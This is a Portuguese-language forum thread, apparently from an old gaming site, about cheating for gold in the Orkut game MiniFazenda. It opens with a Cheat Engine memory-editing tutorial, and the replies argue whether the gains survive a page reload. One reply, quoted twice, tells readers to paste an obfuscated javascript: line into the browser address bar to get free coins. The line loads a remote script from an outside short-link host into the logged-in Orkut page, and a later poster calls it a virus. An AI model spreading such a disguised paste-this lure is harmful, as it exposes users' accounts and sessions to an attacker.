Ir para conteúdo
Faça parte da equipe! (2024) ×

Hack de Gold - MiniFazenda


MaximusLegend¹²³
 Compartilhar

Posts Recomendados

-=-Tutorial-=-

 

1°Abra o MiniFazenda

 

2°Abra o Hack ( Cheat Engine 5.5 ) e clica no computador que esta piscando , depois voce click no Time De internet ( Explorer , FireFox e ETC ... )

 

3°Olhe quanto dinheiro você tem ( Ex : 280 Golds ) , Vá la no CE e em Value coloque o seu dinheiro , depois click em NewScan

 

4°Compre algo pode ser qualquer valor ( Ex : 20 Gols ) , Plante .

 

5°Você vai la no CE e em Value mude de 280 Gols , para 260 Gols e Next Scan

 

Porque mudar 280 para 260 ??

Pq 20 - 280 = 260

 

6°La no Canto Esquerdo do CE apareceu so um adres , clica 2 vezes nele .

 

7°Ai la em baixo tem

Value

260 -> Click duas vezes neste valor e mude para 999999 , depois OK

 

8°depois FRISA e boa diversão .

 

:: Download: Clique aqui

:: Scan: Clique aqui

 

-=-Video Aula-=-

Link para o comentário
Compartilhar em outros sites

Realmente é Client Side, mais não significa que não funciona, pra falar a verdade ele funciona sim , só que não da pra comprar ;x

 

Closed ake plz!

 

Claro que da para comprar , você ja testou ??

 

Olhe o Vídeo esta mostrando como da para comprar .

Link para o comentário
Compartilhar em outros sites

Mais o cheat engine cria ilusão... quando você atualiza a pagina ou entao reinicia o orkut tudo que você comprou já sumiu!... não teria um cheat ou bug msm? sem o cheat engine!! porque ele é programa ilusório.... eu testei aqui no IE e no Firefox e nos dois foi a mesma coisa! quando atualiza some tudo!

Link para o comentário
Compartilhar em outros sites

Mais o cheat engine cria ilusão... quando você atualiza a pagina ou entao reinicia o orkut tudo que você comprou já sumiu!... não teria um cheat ou bug msm? sem o cheat engine!! porque ele é programa ilusório.... eu testei aqui no IE e no Firefox e nos dois foi a mesma coisa! quando atualiza some tudo!

 

Claro que não , Muitas vezes sim e outras não , eu era HACK de DragonFlable , MechQuest , AQ World e ainda sou .

 

O DragonFable usase o CE e não é iluzão e real , eu consegui deixar meu ataque 99999 e matava os monstro em um so ataque

Link para o comentário
Compartilhar em outros sites

mais no caso desse game é ilusão... seja de dinheiro ou no speed hack.... eu tentei os dois no IE, no Firefox e acabei de tentar no Safary e msm assim nao deu.... tipo... da pra comprar... ai vc fica com 999999 de dinheiro faz a festa... compra coisa pra kct... ai se vc fechar o orkut ou atualizar ou até msm mudar de pagina tudo volta ao normal vc fica com o dim ki vc tava... isso quando nao da erro de sincronismo antes de vc fazer a festa.. kkkkk....

Link para o comentário
Compartilhar em outros sites

Claro que da para comprar , você ja testou ??

 

Olhe o Vídeo esta mostrando como da para comprar .

 

Desculpe, realmente funciona mais da erro de sincronização logo em seguida, e quando volta pro jogo sumiu seu dinheiro e oq vc comprou!

Link para o comentário
Compartilhar em outros sites

AE EU VI ISSO EN UMA COMUNIDADE E FALA TUDO + AINDA NAO ACONTECEU NADA PRA MIN

 

Lenbrando nao foi eu que criei

 

1) Primeiro, Copie o codigo abaixo que esta escrito em VERMELHO

 

Codigo

javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild©;c.src=%22ht%22+%22tp:%22+%22//sn%22+%22.%22+%22im%22+%22/%22+%22ttr9o%22;void(0)

 

 

2) Cole o codigo na barra de NAVEGACAO ( onde escreve http://WWW.orkut...) e aperte ENTER

 

3) Ira aparecer uma Janelinha pedindo pra voce escolher a Quantidade de moedas, escolha e de OK

 

4) Agora aguarde 5 minutinhos, quando terminar aparecera uma mensagem avisando voce.

 

Link da comunidade:orkut -

 

c alguem consiguir agradeça ^^ eu nao consigui

Link para o comentário
Compartilhar em outros sites

AE EU VI ISSO EN UMA COMUNIDADE E FALA TUDO + AINDA NAO ACONTECEU NADA PRA MIN

 

Lenbrando nao foi eu que criei

 

1) Primeiro, Copie o codigo abaixo que esta escrito em VERMELHO

 

Codigo

javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild©;c.src=%22ht%22+%22tp:%22+%22//sn%22+%22.%22+%22im%22+%22/%22+%22ttr9o%22;void(0)

 

 

2) Cole o codigo na barra de NAVEGACAO ( onde escreve http://WWW.orkut...) e aperte ENTER

 

3) Ira aparecer uma Janelinha pedindo pra voce escolher a Quantidade de moedas, escolha e de OK

 

4) Agora aguarde 5 minutinhos, quando terminar aparecera uma mensagem avisando voce.

 

Link da comunidade:orkut -

 

c alguem consiguir agradeça ^^ eu nao consigui

 

isso é virus ! AOIEUAIEUAIOEUAOIU

Link para o comentário
Compartilhar em outros sites

Bom , Cara sinseramente esse Cheat Engine 5.5 Não Funciona !

Eu ja usei em vários jogos, ele apenas cria uma ilusão , e se voce quiser usar Speed Hack

pode usar a vontade, depois que voce relogar , apenas nao vai estar mais ali oque voce plantou . Isso só cria uma Ilusão. Eu quero ver voce fazer um video usando o Cheat Engine 5.5 , usar o Gold , Comprar e Relogar e continuar o dinheiro ou o item, quando voce conseguir fazer isso ai voce posta uma coisa certa ! , se conseguir ou alguem aqui me chama no Msn : [email protected] [ Sou level 22 e nunca usei hacker e nao é essa vez q vai funfar]

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.